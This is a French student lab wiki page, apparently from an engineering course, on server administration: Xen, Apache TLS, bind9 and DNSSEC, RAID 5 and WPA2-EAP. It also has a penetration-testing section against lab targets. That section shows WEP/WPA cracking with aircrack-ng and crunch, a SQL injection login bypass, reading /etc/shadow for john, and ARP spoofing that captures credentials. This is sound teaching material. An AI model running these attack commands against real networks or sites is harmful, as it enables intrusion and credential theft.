    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.6&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 306&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 306&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54555</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54555"/>
				<updated>2020-12-14T15:43:06Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
